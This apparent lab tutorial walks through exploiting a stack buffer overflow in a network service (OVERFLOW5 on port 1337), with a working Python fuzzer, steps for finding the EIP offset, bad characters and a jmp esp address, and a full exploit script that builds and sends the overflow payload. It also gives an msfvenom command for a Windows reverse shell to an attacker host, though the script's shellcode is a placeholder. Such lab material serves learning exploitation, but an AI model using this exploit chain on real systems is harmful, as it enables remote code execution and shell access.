BoF Script Python

Not a polished set of scripts, but you can learn from it.

1-fuzzer.py

The main idea is to send a growing string of "A"s until the service crashes; the size at which it stops responding is the approximate crash size used in the next step.

import socket, time, sys

ip = "10.10.12.54"
port = 1337
timeout = 5            # seconds; a recv() that times out means the service stopped answering
prefix = "OVERFLOW5 "  # command the vulnerable service expects in front of the data
string = prefix + "A" * 100

while True:
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            s.connect((ip, port))
            s.recv(1024)  # read the banner
            print(f"Fuzzing with {len(string) - len(prefix)} bytes")
            s.send(bytes(string, "latin-1"))
            s.recv(1024)  # no reply within the timeout -> the service has probably crashed
    except OSError:  # socket.timeout and ConnectionRefusedError are both OSError subclasses
        print(f"Fuzzing crashed at {len(string) - len(prefix)} bytes")
        sys.exit(0)
    string += "A" * 100  # grow the buffer by 100 bytes each round
    time.sleep(1)

2-pattern.py

Replace the "A" padding with a cyclic pattern whose length is the crash size reported by the fuzzer plus 200 bytes (the fuzzer grows in steps of 100, so the exact crash point lies somewhere inside the last step). After the crash, read the value in EIP from the debugger and look it up in the pattern: the position of those 4 bytes is the exact offset of EIP.

Use this website to generate the pattern and to look up the offset --> https://wiremask.eu/tools/buffer-overflow-pattern-generator/

3-checkEIP.py

Optional: send exactly offset bytes of "A" followed by "BBBB" and confirm that the debugger shows EIP = 42424242. That proves you control EIP before moving on.

4-sendBadChar.py

Replace the payload after EIP with all bytes \x01..\xff in order (\x00 is almost always bad, so it is left out from the start) and compare the stack dump in the debugger with what was sent; the first byte that is missing or altered is a bad character. Remove it, resend, and repeat until the dump matches the sent bytes exactly. Generate the byte string with this python script --> https://github.com/joshua17sc/Buffer-Overflows/blob/main/create.py

5-jmp_esp_module.py

Replace "BBBB" (the EIP bytes) with the address of a jmp esp instruction from a module without protections (for example one found with mona in Immunity Debugger), written little-endian and free of bad characters. When the function returns, EIP points at that instruction and execution continues at ESP, i.e. at your payload.

6-revshell.py

Send the final payload to the server: padding up to EIP, the jmp esp address, a NOP sled (about 16 \x90 bytes, so the msfvenom decoder stub has room to unpack), and the shellcode.

Generate the shellcode with msfvenom, passing the bad characters found in step 4 with -b so the encoder avoids them, and start your listener before sending.
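The six steps above as one script, added here as a worked example; it is not one of the page's own scripts. Target, prefix, the EIP value 0x68423368, the jmp esp address 0x625011af and the int3 placeholder shellcode are constructed assumptions; in practice they come from the fuzzer, the debugger, mona and msfvenom. The pattern generator produces the same Aa0Aa1... sequence as the wiremask tool, so the offset can be looked up offline.

```python
import socket
import struct
import string

# Constructed values for this example; the real ones come from the fuzzer,
# the debugger and mona, not from this page.
IP = "10.10.12.54"
PORT = 1337
PREFIX = "OVERFLOW5 "
TIMEOUT = 5


def pattern_create(length):
    """Cyclic pattern in the same Aa0Aa1Aa2... form as the wiremask/Metasploit
    generator: every 4-byte window is unique, so the bytes in EIP give the offset."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(eip_value, length=20280):
    """Offset of the value the debugger shows in EIP after the pattern crash.
    x86 is little-endian, so the 4 bytes are packed reversed before searching."""
    needle = struct.pack("<I", eip_value).decode("latin-1")
    return pattern_create(length).find(needle)  # -1 if the pattern never reached EIP


def badchar_string(exclude=(0x00,)):
    """Every byte 0x00..0xff minus the ones already known to be bad (0x00 always is).
    Send this after the EIP bytes and compare the stack dump with what was sent."""
    return bytes(b for b in range(256) if b not in exclude)


def first_mismatch(sent, dumped):
    """Return the first sent byte that the stack dump shows mangled, i.e. the next
    bad character to add to the exclude list, or None when the dump matches."""
    for a, b in zip(sent, dumped):
        if a != b:
            return a
    return None


def build_payload(offset, jmp_esp, shellcode, nops=16):
    """prefix + padding up to EIP + jmp esp address (little-endian) + NOP sled + shellcode.
    The sled gives the msfvenom decoder stub room to unpack without trampling itself."""
    return (PREFIX.encode("latin-1")
            + b"A" * offset
            + struct.pack("<I", jmp_esp)
            + b"\x90" * nops
            + shellcode)


def send_payload(payload, ip=IP, port=PORT, timeout=TIMEOUT):
    """One connection, one payload (same pattern as the fuzzer)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        s.connect((ip, port))
        s.recv(1024)  # banner
        s.send(payload)


if __name__ == "__main__":
    # Step 2: fuzzer reported ~2000 bytes, so send a 2200-byte pattern.
    send_payload(PREFIX.encode("latin-1") + pattern_create(2200).encode("latin-1"))
    # Step 3/4: EIP read from the debugger (constructed value) -> offset,
    # then the badchar sweep with "BBBB" in EIP; rerun with a growing exclude list.
    offset = pattern_offset(0x68423368)
    send_payload(build_payload(offset, 0x42424242, badchar_string((0x00,)), nops=0))
    # Step 5/6: jmp esp address from mona (constructed here) plus msfvenom output, e.g.
    #   msfvenom -p windows/shell_reverse_tcp LHOST=<attacker> LPORT=4444 \
    #            EXITFUNC=thread -b "\x00" -f py
    shellcode = b"\xcc" * 4  # placeholder: int3 breakpoints instead of real shellcode
    send_payload(build_payload(offset, 0x625011af, shellcode))
```

For the badchar step, paste the bytes the debugger shows at ESP into first_mismatch next to what badchar_string returned; the byte it returns goes into the exclude tuple (and later into msfvenom's -b list) before the next run.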

Create Bad Char

create.py
